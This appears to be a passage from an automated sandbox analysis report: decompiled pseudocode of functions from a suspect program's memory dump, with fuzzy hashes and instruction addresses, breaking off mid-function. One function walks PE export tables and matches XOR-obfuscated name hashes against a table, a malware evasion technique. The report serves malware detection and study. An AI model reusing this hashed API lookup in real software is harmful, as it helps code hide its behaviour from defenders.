Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction ID: 03ed332e2eff42af717bf90d10d3eab16b9a1aa5816782bb494fe038db6b9032
Opcode Fuzzy Hash: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction Fuzzy Hash: 87325A74A083924BD7178A388490B2A7BE66FC7310F1DC6ADE896CF257DB74CD419782

Uniqueness

Uniqueness Score: -1.00%

Function 003A9E70, Relevance: 1.8, Strings: 1, Instructions: 591
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003A9E70(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t212;
				void* _t214;
				void* _t218;
				void* _t287;
				void* _t289;
				void* _t290;
				void* _t291;
				char* _t324;
				void* _t337;
				void* _t340;
				signed int _t358;
				char _t360;
				intOrPtr _t369;
				intOrPtr _t370;
				void* _t371;
				void* _t372;
				void* _t374;
				void* _t376;
				void* _t391;
				void* _t410;
				intOrPtr* _t438;
				signed int _t528;
				char* _t529;
				void* _t530;
				intOrPtr* _t533;
				void* _t534;
				signed int _t537;
				void* _t538;
				void* _t539;
				void* _t541;
				intOrPtr _t542;
				void* _t550;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				intOrPtr* _t554;
				intOrPtr _t555;
				void* _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				intOrPtr _t559;
				void* _t561;
				intOrPtr* _t563;
				void* _t564;

				_t512 = __edx;
				_t557 = __edx;
				_t369 = __ecx;
				if(E003D4850(E003C9640(__ecx, 0), __edx) == 0 ||  *((char*)(E003B3930(__ecx, 0, _t530, _t539) + 0xb)) != 0x20) {
					_t212 = E003D48C0(E003C9640(_t369, 0), _t512);
					__eflags = _t212;
					if(_t212 == 0) {
						L36:
						__eflags = 0;
						return 0;
					} else {
						_t214 = E003B3930(_t369, 0, _t530, _t539);
						__eflags =  *((char*)(_t214 + 0xb)) - 0x40;
						if( *((char*)(_t214 + 0xb)) != 0x40) {
							goto L36;
						} else {
							 *((intOrPtr*)(_t563 + 0x10)) = 0x40;
							goto L6;
						}
					}
				} else {
					 *((intOrPtr*)(_t563 + 0x10)) = 0x20;
					L6:
					 *((intOrPtr*)(_t563 + 0x4e8)) = 0;
					 *((intOrPtr*)(_t563 + 0x4ec)) = 0;
					 *((intOrPtr*)(_t563 + 0x4f0)) = 0;
					E003C06A0(_t563 + 0x470, _t557, 0);
					E003B2370(_t563 + 0x474, _t530, _t539);
					_t218 = E003C6EC0(_t563 + 0x474,  *((intOrPtr*)(_t563 + 0x478)), 0);
					E003AAC00(_t563 + 0x47c, 9);
					E003BFDB0(_t563 + 0x480, _t563 + 0x484);
					E003C6EC0(_t218,  *((intOrPtr*)(_t563 + 0x488)), 0);
					E003C0B10(_t563 + 0x484);
					E003B8CA0(_t563 + 0x47c);
					E003C0B10(_t563 + 0x474);
					_t391 = _t563 + 0x18c;
					 *((intOrPtr*)(_t391 - 0x10)) = 0;
					 *((char*)(_t391 - 0xc)) = 1;
					 *((intOrPtr*)(_t391 - 8)) = 0;
					 *((intOrPtr*)(_t391 - 4)) = 3;
					E003B87A0(_t391);
					_push(1);
					if(E003CCEA0(_t369, _t563 + 0x180,  *((intOrPtr*)(_t563 + 0x46c)), _t563 + 0x484, _t218) != 0) {
						 *((intOrPtr*)(_t563 + 4)) = _t557;
						_t538 = _t563 + 0x1c0;
						_t556 = _t563 + 0x4c4;
						goto L8;
						L8:
						E003B8AB0(_t563 + 0x4c4, _t538, 0);
						E003BFDB0(_t563 + 0x4c0, _t556);
						E003C37E0(_t563 + 0x4f0,  *((intOrPtr*)(_t563 + 0x4c8)),  *((intOrPtr*)(_t563 + 0x4e8)));
						E003C0B10(_t556);
						E003B8CA0(_t563 + 0x4bc);
						if(E003CD0E0(_t563 + 0x17c) != 0) {
							goto L8;
						} else {
							_t557 =  *((intOrPtr*)(_t563 + 4));
						}
					}
					E003B8CA0(_t563 + 0x18c);
					if( *((char*)(_t563 + 0x180)) != 0) {
						_t555 =  *((intOrPtr*)(_t563 + 0x17c));
						if(_t555 == 0 || _t555 == 0xffffffff) {
							_t360 = 1;
						} else {
							_t360 = 0;
						}
						if(_t360 == 0) {
							E003CCE70(_t555);
						}
					}
					 *((intOrPtr*)(_t563 + 0x17c)) = 0;
					E003C0B10(_t563 + 0x46c);
					 *((intOrPtr*)(_t563 + 0x440)) = 0;
					 *((intOrPtr*)(_t563 + 0x444)) = 0;
					 *((intOrPtr*)(_t563 + 0x448)) = 0;
					_t541 = E003CE170(0,  *((intOrPtr*)(_t563 + 0x4e8)));
					 *((intOrPtr*)(_t563 + 0x14)) =  *((intOrPtr*)(_t563 + 0x4e8));
					 *_t563 = _t369;
					 *((intOrPtr*)(_t563 + 4)) = _t557;
					_t558 = 0;
					while(1) {
						_t542 =  ==  ? _t558 : _t541;
						_t533 = E003C7600(_t563 + 0x4ec, _t542);
						_t516 = _t533;
						if(E003AA830( *((intOrPtr*)(_t563 + 0x10)), _t533, _t542) == 0) {
							goto L35;
						}
						E003C06A0(_t563 + 0x4d0, _t558, 0);
						E003B2370(_t563 + 0x4d4, _t533, _t542);
						E003C6EC0(E003C6EC0(_t563 + 0x4d4,  *((intOrPtr*)(_t563 + 0x4d8)), 0),  *_t533, 0);
						E003C0B10(_t563 + 0x4d4);
						E003CA280(_t563 + 0x49c,  *((intOrPtr*)(_t563 + 0x4d8)), 1, 0, 0x80);
						E003CA520(_t563 + 0x494, _t516, _t563 + 0x4a4, 0);
						E003D4A20(_t563 + 0x4dc, E003C9640(_t563 + 0x4a4, 0));
						E003C9510(_t563 + 0x4a0);
						E003CBDC0(_t563 + 0x49c, 0);
						if(E003C7620(_t563 + 0x4dc, _t542) != 0) {
							 *((intOrPtr*)(_t563 + 0x4b0)) = _t558;
							_t410 = _t563 + 0x4dc;
							 *((intOrPtr*)(_t410 - 0x28)) = _t558;
							 *((intOrPtr*)(_t410 - 0x24)) = _t558;
							E003C7560(_t410, _t533, _t542);
							__eflags =  *((char*)(_t563 + 0x49c));
							if( *((char*)(_t563 + 0x49c)) != 0) {
								E003CBE30(_t563 + 0x498, _t542);
							}
						} else {
							if( *((intOrPtr*)(_t563 + 0x4dc)) > 0) {
								 *((intOrPtr*)(_t563 + 0xc)) = _t533;
								 *((intOrPtr*)(_t563 + 8)) = _t542;
								_t376 = _t563 + 0x4f4;
								do {
									_t554 = E003C7600(_t563 + 0x4e0, _t558);
									E003C1020(_t554, _t376);
									_t358 = E003CD620( *((intOrPtr*)(_t563 + 0x4f4)), E003C6040( *((intOrPtr*)(_t563 + 0x4f4)), 0x7fffffff));
									E003C0B10(_t376);
									_t537 = _t358 ^ 0x38ba5c7b;
									_t528 = 0;
									while(_t537 !=  *((intOrPtr*)(0x3d9440 + _t528 * 4))) {
										_t528 = _t528 + 1;
										if(_t528 < 0x30) {
											continue;
										} else {
											_t529 =  *_t554;
											if(_t529 != 0) {
												 *_t529 = 0;
											}
										}
										goto L27;
									}
									L27:
									_t558 = _t558 + 1;
								} while (_t558 <  *((intOrPtr*)(_t563 + 0x4dc)));
								_t533 =  *((intOrPtr*)(_t563 + 0xc));
								_t558 = 0;
								_t542 =  *((intOrPtr*)(_t563 + 8));
							}
							E003C71F0(_t563 + 0x4b4, _t542, E003C3EC0(_t563 + 0x4dc));
							E003C7560(_t563 + 0x4dc, _t533, _t542);
							if( *((char*)(_t563 + 0x49c)) != 0) {
								E003CBE30(_t563 + 0x498, _t542);
							}
						}
						E003B8CA0(_t563 + 0x48c);
						E003C0B10(_t563 + 0x4cc);
						if(E003C7620(_t563 + 0x4b0, _t542) != 0) {
							E003C7560(_t563 + 0x4b0, _t533, _t542);
							goto L35;
						}
						_t370 =  *_t563;
						_t559 =  *((intOrPtr*)(_t563 + 4));
						_t543 = E003CE170(0,  *((intOrPtr*)(_t563 + 0x4b0)));
						E003C37E0(_t563 + 0x448,  *_t533,  *((intOrPtr*)(_t563 + 0x440)));
						E003C37E0(_t563 + 0x448,  *((intOrPtr*)(E003C7600(_t563 + 0x4b4, _t252))),  *((intOrPtr*)(_t563 + 0x440)));
						E003C7560(_t563 + 0x4b0, _t533, _t252);
						E003C7560(_t563 + 0x4e8, _t533, _t252);
						E003C06A0(_t563 + 0x450, _t559, 0);
						E003C06A0(_t563 + 0x458, _t559, 0);
						E003C6EC0(_t563 + 0x454,  *((intOrPtr*)(E003C7600(_t563 + 0x444, 0))), 0);
						E003C6EC0(_t563 + 0x45c,  *((intOrPtr*)(E003C7600(_t563 + 0x444, 1))), 0);
						E003C06A0(_t563 + 0x460, _t559, 0);
						E003B2370(_t563 + 0x464, _t533, _t252);
						E003C6EC0(E003C6EC0(_t563 + 0x464,  *((intOrPtr*)(_t563 + 0x468)), 0),  *((intOrPtr*)(_t563 + 0x458)), 0);
						E003C0B10(_t563 + 0x464);
						E003CA280(_t563 + 0x42c,  *((intOrPtr*)(_t563 + 0x468)), 1, 0, 0x80);
						E003CA520(_t563 + 0x424,  *((intOrPtr*)(_t563 + 0x4b0)), _t563 + 0x430, 0);
						__eflags =  *((char*)(_t563 + 0x42c));
						if( *((char*)(_t563 + 0x42c)) != 0) {
							E003CBE30(_t563 + 0x428, _t543);
						}
						E003B8CA0(_t563 + 0x41c);
						__eflags = E003C9660(_t563 + 0x430);
						if(__eflags == 0) {
							E003C06A0(_t563 + 0x3e4, _t559, 0);
							_push(0);
							E003C9350(_t563 + 0x3f4);
							_push(0);
							E003C9350(_t563 + 0x404);
							_t438 = _t563 + 0x410;
							 *_t438 = 0;
							 *((intOrPtr*)(_t438 + 4)) = 0;
							 *((intOrPtr*)(_t438 + 8)) = 0;
							E003C7560(_t438, _t533, _t543);
							E003CA110(_t563 + 0x400);
							_t280 = E003CA110(_t563 + 0x3f0);
							__eflags =  *((intOrPtr*)(_t563 + 0x10)) - 0x20;
							if( *((intOrPtr*)(_t563 + 0x10)) != 0x20) {
								__eflags =  *((intOrPtr*)(_t563 + 0x10)) - 0x40;
								if( *((intOrPtr*)(_t563 + 0x10)) == 0x40) {
									_t337 = E003D47D0(E003C9640(_t563 + 0x434, 0));
									_t280 = _t337 + 0x88;
									__eflags = _t337 + 0x88;
								}
							} else {
								_t280 = E003D47D0(E003C9640(_t563 + 0x434, 0)) + 0x78;
							}
							_t534 = E003D4830(E003C9640(_t563 + 0x434, 0),  *_t280);
							 *((intOrPtr*)(_t563 + 0x3ec)) =  *((intOrPtr*)(_t534 + 0x10));
							E003C0B30(_t563 + 0x3e8,  *((intOrPtr*)(_t534 + 0xc)), E003D4830(E003C9640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0xc))));
							_t287 = E003D4830(E003C9640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0x20)));
							__eflags =  *((intOrPtr*)(_t534 + 0x18));
							if( *((intOrPtr*)(_t534 + 0x18)) > 0) {
								 *_t563 = _t370;
								_t553 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t374 = _t287;
								do {
									E003C37E0(_t563 + 0x418, E003D4830(E003C9640(_t563 + 0x434, 0),  *((intOrPtr*)(_t374 + _t553 * 4))),  *((intOrPtr*)(_t563 + 0x410)));
									_t553 = _t553 + 1;
									__eflags = _t553 -  *((intOrPtr*)(_t534 + 0x18));
								} while (_t553 <  *((intOrPtr*)(_t534 + 0x18)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							_t289 = E003D4830(E003C9640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0x24)));
							__eflags =  *((intOrPtr*)(_t534 + 0x18));
							if( *((intOrPtr*)(_t534 + 0x18)) > 0) {
								 *_t563 = _t370;
								_t552 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t561 = _t289;
								do {
									E003C9670(_t563 + 0x404, E003C9650(_t563 + 0x400) + 2);
									 *((short*)(E003C9640(_t563 + 0x404, E003C9650(_t563 + 0x400) + 0xfffffffe))) =  *(_t561 + _t552 * 2) & 0x0000ffff;
									_t552 = _t552 + 1;
									__eflags = _t552 -  *((intOrPtr*)(_t534 + 0x18));
								} while (_t552 <  *((intOrPtr*)(_t534 + 0x18)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							_t290 = E003C9640(_t563 + 0x434, 0);
							_t523 =  *((intOrPtr*)(_t534 + 0x1c));
							_t291 = E003D4830(_t290,  *((intOrPtr*)(_t534 + 0x1c)));
							__eflags =  *((intOrPtr*)(_t534 + 0x14));
							if( *((intOrPtr*)(_t534 + 0x14)) > 0) {
								 *_t563 = _t370;
								_t551 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t372 = _t291;
								do {
									E003C9670(_t563 + 0x3f4, E003C9650(_t563 + 0x3f0) + 1);
									_t324 = E003C9640(_t563 + 0x3f4, E003C9650(_t563 + 0x3f0) - 1);
									_t523 = _t324;
									__eflags =  *((intOrPtr*)(_t372 + _t551 * 4));
									_t551 = _t551 + 1;
									 *_t324 = 0 | __eflags > 0x00000000;
									__eflags = _t551 -  *((intOrPtr*)(_t534 + 0x14));
								} while (_t551 <  *((intOrPtr*)(_t534 + 0x14)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							 *_t563 = 0;
							_push(0);
							E003C9350(_t563 + 0x150);
							_t550 = _t563 + 4;
							 *((intOrPtr*)(_t550 + 0x158)) = 0;
							 *((intOrPtr*)(_t550 + 0x15c)) = 0;
							 *((intOrPtr*)(_t550 + 0x160)) = 0;
							 *((intOrPtr*)(_t550 + 0x164)) = 0;
							E003B0B70(_t550, 0, 0x40);
							E003B0B70(_t563 + 0x50, 0, 0x108);
							_t564 = _t563 + 0x18;
							_push(_t370);
							E003D3CE0(_t564 + 4, __eflags);
							_push(_t564 + 0x3e4);
							E003D4170(_t564 + 4);
							_t371 = _t564 + 0x16c;
							_push(_t371);
							E003D3EF0(_t564 + 4);
							_push(_t371);
							_t193 = _t559 + 0x10; // 0x10
							E003C9520(_t193);
							E003C9510(_t371);
							_t195 = _t559 + 8; // 0x8
							E003C0B30(_t195, _t523,  *((intOrPtr*)(_t564 + 0x454)));
							E003C0B30(_t559, _t523,  *((intOrPtr*)(_t564 + 0x44c)));
							E003D2970(_t371, _t564 + 0x15c, _t534);
							_t461 =  *((intOrPtr*)(_t564 + 0x168));
							__eflags =  *((intOrPtr*)(_t564 + 0x168));
							if( *((intOrPtr*)(_t564 + 0x168)) != 0) {
								E003A2A20(_t461, 1);
							}
							E003C9510(_t564 + 0x14c);
							E003C7560(_t564 + 0x410, _t534, _t550);
							E003C9510(_t564 + 0x400);
							E003C9510(_t564 + 0x3f0);
							E003C0B10(_t564 + 0x3e4);
							E003C9510(_t564 + 0x430);
							E003C0B10(_t564 + 0x45c);
							E003C0B10(_t564 + 0x454);
							E003C0B10(_t564 + 0x44c);
							E003C7560(_t564 + 0x440, _t534, _t550);
							return 1;
						} else {
							_t340 = E003A9E70(_t370, _t559, __eflags);
							E003C9510(_t563 + 0x430);
							E003C0B10(_t563 + 0x45c);
							E003C0B10(_t563 + 0x454);
							E003C0B10(_t563 + 0x44c);
							E003C7560(_t563 + 0x440, _t533, _t543);
							return _t340;
						}
						goto L60;
						L35:
						_t541 = _t542 + 1;
					}
				}
				L60:
			}

0x003a9e70
0x003a9e7a
0x003a9e7e
0x003a9e8e
0x003a9eb2
0x003a9eb7
0x003a9eb9
0x003aa2cc
0x003aa2cc
0x003aa2d8
0x003a9ebf
0x003a9ec1
0x003a9ec6
0x003a9eca
0x00000000
0x003a9ed0
0x003a9ed0
0x00000000
0x003a9ed0
0x003a9eca
0x003a9e9d
0x003a9e9d
0x003a9ed8
0x003a9eda
0x003a9ee1
0x003a9ee8
0x003a9ef7
0x003a9f03
0x003a9f18
0x003a9f2b
0x003a9f3f
0x003a9f4f
0x003a9f56
0x003a9f62
0x003a9f6e
0x003a9f7a
0x003a9f83
0x003a9f86
0x003a9f8a
0x003a9f8d
0x003a9f94
0x003a9f99
0x003a9fa9
0x003a9fab
0x003a9faf
0x003a9fb6
0x003a9fb6
0x003a9fbd
0x003a9fc7
0x003a9fd4
0x003a9fee
0x003a9ff5
0x003aa001
0x003aa014
0x00000000
0x003aa016
0x003aa016
0x003aa016
0x003aa014
0x003aa021
0x003aa02e
0x003aa030
0x003aa039
0x003aa044
0x003aa040
0x003aa040
0x003aa040
0x003aa04b
0x003aa04e
0x003aa04e
0x003aa04b
0x003aa053
0x003aa065
0x003aa075
0x003aa07c
0x003aa083
0x003aa08f
0x003aa09f
0x003aa0a3
0x003aa0a6
0x003aa0aa
0x003aa0ac
0x003aa0b0
0x003aa0c0
0x003aa0c2
0x003aa0cf
0x00000000
0x00000000
0x003aa0de
0x003aa0ea
0x003aa10a
0x003aa116
0x003aa132
0x003aa148
0x003aa164
0x003aa170
0x003aa17e
0x003aa191
0x003aa263
0x003aa26a
0x003aa271
0x003aa274
0x003aa277
0x003aa27c
0x003aa284
0x003aa28d
0x003aa28d
0x003aa197
0x003aa19f
0x003aa1a5
0x003aa1ab
0x003aa1af
0x003aa1b6
0x003aa1c3
0x003aa1c8
0x003aa1e4
0x003aa1ed
0x003aa1f2
0x003aa1f8
0x003aa1fa
0x003aa203
0x003aa207
0x00000000
0x003aa209
0x003aa209
0x003aa20d
0x003aa20f
0x003aa20f
0x003aa20d
0x00000000
0x003aa207
0x003aa212
0x003aa212
0x003aa213
0x003aa21c
0x003aa220
0x003aa222
0x003aa222
0x003aa23a
0x003aa246
0x003aa253
0x003aa25c
0x003aa25c
0x003aa253
0x003aa299
0x003aa2a5
0x003aa2b8
0x003aa2c1
0x00000000
0x003aa2c1
0x003aa2e2
0x003aa2e5
0x003aa2ee
0x003aa300
0x003aa322
0x003aa32e
0x003aa33a
0x003aa348
0x003aa356
0x003aa374
0x003aa392
0x003aa3a0
0x003aa3ac
0x003aa3d1
0x003aa3dd
0x003aa3f9
0x003aa40f
0x003aa414
0x003aa41c
0x003aa425
0x003aa425
0x003aa431
0x003aa442
0x003aa444
0x003aa4a3
0x003aa4a8
0x003aa4b1
0x003aa4b6
0x003aa4bf
0x003aa4c6
0x003aa4cd
0x003aa4cf
0x003aa4d2
0x003aa4d5
0x003aa4e1
0x003aa4ed
0x003aa4f2
0x003aa4f7
0x003aa513
0x003aa518
0x003aa52a
0x003aa52f
0x003aa52f
0x003aa52f
0x003aa4f9
0x003aa50e
0x003aa50e
0x003aa54d
0x003aa552
0x003aa57b
0x003aa595
0x003aa59a
0x003aa59e
0x003aa5a0
0x003aa5a3
0x003aa5a3
0x003aa5a5
0x003aa5a9
0x003aa5ab
0x003aa5d4
0x003aa5d9
0x003aa5da
0x003aa5da
0x003aa5df
0x003aa5e2
0x003aa5e2
0x003aa5fb
0x003aa600
0x003aa604
0x003aa606
0x003aa609
0x003aa609
0x003aa60b
0x003aa60f
0x003aa611
0x003aa628
0x003aa64e
0x003aa651
0x003aa652
0x003aa652
0x003aa657
0x003aa65a
0x003aa65a
0x003aa66a
0x003aa671
0x003aa673
0x003aa678
0x003aa67c
0x003aa67e
0x003aa681
0x003aa681
0x003aa683
0x003aa687
0x003aa689
0x003aa6a1
0x003aa6bb
0x003aa6c0
0x003aa6c4
0x003aa6c9
0x003aa6ca
0x003aa6cc
0x003aa6cc
0x003aa6d1
0x003aa6d4
0x003aa6d4
0x003aa6da
0x003aa6dd
0x003aa6e5
0x003aa6ec
0x003aa6f0
0x003aa6f6
0x003aa6fc
0x003aa702
0x003aa70c
0x003aa71d
0x003aa722
0x003aa725
0x003aa72a
0x003aa736
0x003aa73b
0x003aa740
0x003aa747
0x003aa74c
0x003aa751
0x003aa752
0x003aa755
0x003aa75c
0x003aa768
0x003aa76b
0x003aa779
0x003aa785
0x003aa78a
0x003aa791
0x003aa793
0x003aa797
0x003aa797
0x003aa7a3
0x003aa7af
0x003aa7bb
0x003aa7c7
0x003aa7d3
0x003aa7df
0x003aa7eb
0x003aa7f7
0x003aa803
0x003aa80f
0x003aa823
0x003aa446
0x003aa44a
0x003aa458
0x003aa464
0x003aa470
0x003aa47c
0x003aa488
0x003aa499
0x003aa499
0x00000000
0x003aa2c6
0x003aa2c6
0x003aa2c6
0x003aa0ac
0x00000000

Strings

@, xrefs: 003AA513

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6ef655f7b7538a3f95d958b895bbaab462c11188b561ac687aa37c2d723de26b
Instruction ID: 3e9713f9f06d0d1777b88e725dab67f718172082dfbfb8e3e53f212b88797bb9
Opcode Fuzzy Hash: 6ef655f7b7538a3f95d958b895bbaab462c11188b561ac687aa37c2d723de26b
Instruction Fuzzy Hash: 2E3255B15183859BC736EF20C852FEFB3A5AF91304F40482DE68A9B192EF716D05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 003C4CA0, Relevance: 1.6, Strings: 1, Instructions: 358
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003C4CA0(signed int* __ecx, intOrPtr* _a4) {
				char _v28;
				unsigned int _v32;
				void* _v36;
				unsigned int _t70;
				char* _t75;
				signed int _t78;
				signed int _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				intOrPtr* _t90;
				signed int _t92;
				void* _t98;
				void* _t99;
				signed int _t101;
				char _t102;
				char _t103;
				char _t104;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				char* _t111;
				void* _t112;
				signed int _t115;
				char _t116;
				char _t117;
				char _t118;
				char _t119;
				char _t120;
				void* _t122;
				char* _t123;
				char _t133;
				char _t134;
				char _t136;
				char _t137;
				char* _t139;
				void* _t140;
				signed int _t142;
				char _t146;
				signed int _t148;
				signed int _t154;
				unsigned int _t155;
				char _t157;
				char _t158;
				char* _t161;
				char* _t162;
				intOrPtr* _t169;
				unsigned int _t170;
				void* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff0) - 0x14;
				_t70 =  *0x3da24c; // 0xa0d0920
				_t119 =  *0x3da250; // 0x0
				_v32 = _t70;
				_v28 = _t119;
				_t101 =  *__ecx;
				if(_t101 == 0) {
					_t120 = 0;
					_t88 = 0;
				} else {
					_t142 = _t101 & 0x0000000f;
					if(_t142 == 0) {
						L5:
						asm("pxor xmm0, xmm0");
						_t98 =  ~( ~_t142 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [ecx+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb eax, xmm1");
							if(_t70 != 0) {
								break;
							}
							_t142 = _t142 + 0x10;
							if(_t142 < _t98) {
								continue;
							} else {
								if(_t98 >= 0x7fffffff) {
									L11:
									_t88 = 0x7fffffff;
									goto L12;
								} else {
									while( *((char*)(_t98 + _t101)) != 0) {
										_t98 = _t98 + 1;
										if(_t98 < 0x7fffffff) {
											continue;
										} else {
											goto L11;
										}
										goto L18;
									}
									goto L102;
								}
							}
							goto L18;
						}
						asm("bsf ebx, eax");
						_t88 = _t98 + _t142;
						goto L102;
					} else {
						_t88 = 0;
						_t142 =  ~_t142 + 0x10;
						while( *((char*)(_t88 + _t101)) != 0) {
							_t88 = _t88 + 1;
							if(_t88 < _t142) {
								continue;
							} else {
								goto L5;
							}
							goto L18;
						}
						L102:
						if(_t88 > 0) {
							L12:
							_t120 = 0;
							_t155 = _v32;
							_t171 = 0;
							_v36 = _t88;
							while(_t155 != 0) {
								_t86 =  *((intOrPtr*)(_t120 + _t101));
								_t99 = 0;
								while(_t86 !=  *((intOrPtr*)(_t174 + _t99 + 4))) {
									_t99 = _t99 + 1;
									if( *((char*)(_t174 + _t99 + 4)) != 0) {
										continue;
									}
									goto L17;
								}
								_t171 = _t171 + 1;
								_t120 = _t120 + 1;
								if(_t171 < _v36) {
									continue;
								} else {
									break;
								}
								L106:
							}
							L17:
							_t88 = _v36;
						} else {
							_t120 = 0;
						}
						goto L18;
						L93:
						return _t90;
						goto L106;
					}
				}
				L18:
				_t89 = _t88 - 1;
				_t146 = _t88 - _t120;
				if(_t89 >= _t120) {
					_t170 = _v32;
					_v36 = _t120;
					while(_t170 != 0) {
						_t85 =  *((intOrPtr*)(_t89 + _t101));
						_t140 = 0;
						while(_t85 !=  *((intOrPtr*)(_t174 + _t140 + 4))) {
							_t140 = _t140 + 1;
							if( *((char*)(_t174 + _t140 + 4)) != 0) {
								continue;
							}
							goto L24;
						}
						_t89 = _t89 - 1;
						_t146 = _t146 - 1;
						if(_t89 >= _v36) {
							continue;
						} else {
							break;
						}
						goto L93;
					}
					L24:
					_t120 = _v36;
				}
				_t90 = _a4;
				if(_t146 != 0) {
					if(_t101 == 0) {
						_t157 = 0;
					} else {
						_t81 = _t101 & 0x0000000f;
						if(_t81 == 0) {
							L39:
							asm("pxor xmm0, xmm0");
							_t157 =  ~( ~_t81 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [ecx+eax]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ebx, xmm1");
								if(_t90 != 0) {
									break;
								}
								_t81 = _t81 + 0x10;
								if(_t81 < _t157) {
									continue;
								} else {
									_t90 = _a4;
									if(_t157 >= 0x7fffffff) {
										L45:
										_t157 = 0x7fffffff;
									} else {
										while( *((char*)(_t157 + _t101)) != 0) {
											_t157 = _t157 + 1;
											if(_t157 < 0x7fffffff) {
												continue;
											} else {
												goto L45;
											}
											goto L46;
										}
									}
								}
								goto L46;
							}
							_t169 = _t90;
							asm("bsf esi, esi");
							_t90 = _a4;
							_t157 = _t169 + _t81;
						} else {
							_t157 = 0;
							_t81 =  ~_t81 + 0x10;
							while( *((char*)(_t157 + _t101)) != 0) {
								_t157 = _t157 + 1;
								if(_t157 < _t81) {
									continue;
								} else {
									goto L39;
								}
								goto L46;
							}
						}
					}
					L46:
					_t121 =  <=  ? 0 : _t120;
					_t122 =  <  ? _t157 :  <=  ? 0 : _t120;
					_t158 = _t157 - _t122;
					if(_t146 < 0 || _t146 > _t158) {
						_t146 = _t158;
					}
					 *_t90 = 0;
					 *(_t90 + 4) = 0;
					_t161 = _t122 + _t101;
					if(_t161 == 0 ||  *(_t101 + _t122) == 0) {
						_push(0x40);
						_t162 = E003B1030();
						_t174 = _t174 + 4;
						_t123 =  *_t90;
						if(_t123 == 0) {
							 *_t162 = 0;
						} else {
							if(_t162 != 0) {
								_t102 =  *_t123;
								 *_t162 = _t102;
								if(_t102 != 0) {
									_t148 = 0;
									while(1) {
										_t148 = _t148 + 1;
										_t103 =  *((char*)(_t123 + _t148 * 2 - 1));
										 *((char*)(_t162 + _t148 * 2 - 1)) = _t103;
										if(_t103 == 0) {
											goto L90;
										}
										_t104 =  *((char*)(_t123 + _t148 * 2));
										 *((char*)(_t162 + _t148 * 2)) = _t104;
										if(_t104 != 0) {
											continue;
										}
										goto L90;
									}
								}
							}
							L90:
							_push(1);
							_push(_t123);
							E003B10B0();
							_t174 = _t174 + 8;
						}
						goto L92;
					} else {
						if(_t146 == 0) {
							_t115 = _t101 + _t122;
							_t78 = _t115 & 0x0000000f;
							if(_t78 == 0) {
								L56:
								asm("pxor xmm0, xmm0");
								_t146 =  ~( ~_t78 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [ecx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb edx, xmm1");
									if(_t122 != 0) {
										break;
									}
									_t78 = _t78 + 0x10;
									if(_t78 < _t146) {
										continue;
									} else {
										if(_t146 >= 0x7fffffff) {
											L62:
											_t146 = 0x7fffffff;
										} else {
											while( *((char*)(_t146 + _t115)) != 0) {
												_t146 = _t146 + 1;
												if(_t146 < 0x7fffffff) {
													continue;
												} else {
													goto L62;
												}
												goto L63;
											}
										}
									}
									goto L63;
								}
								asm("bsf edi, edx");
								_t146 = _t146 + _t78;
							} else {
								_t146 = 0;
								_t78 =  ~_t78 + 0x10;
								while( *((char*)(_t146 + _t115)) != 0) {
									_t146 = _t146 + 1;
									if(_t146 < _t78) {
										continue;
									} else {
										goto L56;
									}
									goto L63;
								}
							}
						}
						L63:
						_t36 = _t146 + 1; // 0x80000000
						_t106 =  <=  ? 0x40 : _t36;
						if(_t106 > 0) {
							_v32 = (_t106 >> 5 >> 0x1a) + _t106 >> 6;
							_t107 = _t106 & 0x8000003f;
							if(_t107 < 0) {
								_t107 = (_t107 - 0x00000001 | 0xffffffc0) + 1;
							}
							_t110 = _v32 + (0 | _t107 > 0x00000000) << 6;
							_v32 = _t110;
							_push(_t110);
							_t75 = E003B1030();
							_t174 = _t174 + 4;
							_t111 =  *_t90;
							if(_t111 == 0) {
								 *_t75 = 0;
							} else {
								if(_t75 != 0) {
									_t134 =  *_t111;
									 *_t75 = _t134;
									if(_t134 != 0) {
										_v36 = _t161;
										_t92 = 0;
										while(1) {
											_t92 = _t92 + 1;
											_t136 =  *((char*)(_t111 + _t92 * 2 - 1));
											 *((char*)(_t75 + _t92 * 2 - 1)) = _t136;
											if(_t136 == 0) {
												break;
											}
											_t137 =  *((char*)(_t111 + _t92 * 2));
											 *((char*)(_t75 + _t92 * 2)) = _t137;
											if(_t137 != 0) {
												continue;
											}
											break;
										}
										_t161 = _v36;
										_t90 = _a4;
									}
								}
